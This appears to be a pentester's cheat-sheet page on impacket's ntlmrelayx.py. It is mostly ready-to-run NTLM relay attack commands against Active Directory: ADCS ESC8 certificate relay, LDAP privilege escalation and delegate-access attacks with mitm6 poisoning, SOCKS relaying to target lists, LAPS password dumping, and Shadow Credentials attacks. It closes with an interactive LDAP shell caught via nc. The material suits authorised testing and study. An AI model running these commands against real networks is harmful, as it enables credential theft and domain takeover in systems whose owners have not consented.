Powered by

# ntlmrelayx.py

ntlmrelay is part of impacket.

# Logging output 

ntlmrelayx YOUR-COMMANDS --output-file output.log

Need to revisit this - I think this only captures hashes

# Relaying with ADCS ESC8 attack 

ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'

# Escalate privileges via relay

If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!

# Delegate access attack while poisoning with mitm6 

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

# Setup SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We setup the SOCKS relay like so:

ntlmrelayx.py -tf targets.txt -smb2support -socks

# Dumping LAPS passwords

If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

# Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint security

# Find hosts with WebClient running

The webclientservicescanner works well for this.

# Add a rogue DNS record pointing to your machine

Try dnstool.py for this.

# Setup relay for the Shadow Credentials attack 

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da

# Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.

# Shadow Credentials attack (with LDAP shell)

I followed these instructions to pwn a HBT: Mist machine for this.

# Get a venv setup 

python3 -m venv venv 
source venv/bin/activate

# Install the appropriate impacket fork 

git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .

# Run ntlmrelayx with sudo permissions: 

sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -t ldap://ip.of.a.dc -i

# Be ready to "catch" the relay 

nc 127.0.0.1 11000